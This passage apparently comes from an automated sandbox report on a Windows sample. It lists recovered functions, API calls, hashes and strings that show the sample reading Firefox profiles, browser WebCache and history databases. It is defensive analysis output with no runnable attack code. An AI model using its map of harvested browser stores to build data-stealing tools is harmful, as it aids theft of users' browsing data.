                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                              Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 3249829328-1174173950
                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                              Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 669240632-0
                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                              Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                              Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                              Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                              Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                              Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • memset.MSVCRT ref: 00414C87
                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 2705122986-2036018995
                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                              Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                              Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 3354267031-2114579845
                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotificationSleep
                                                              • String ID: }A
                                                              • API String ID: 1821831730-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT ref: 00444BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                              • String ID:
                                                              • API String ID: 1042154641-0
                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 3093078384-467022611
                                                              • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                              Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
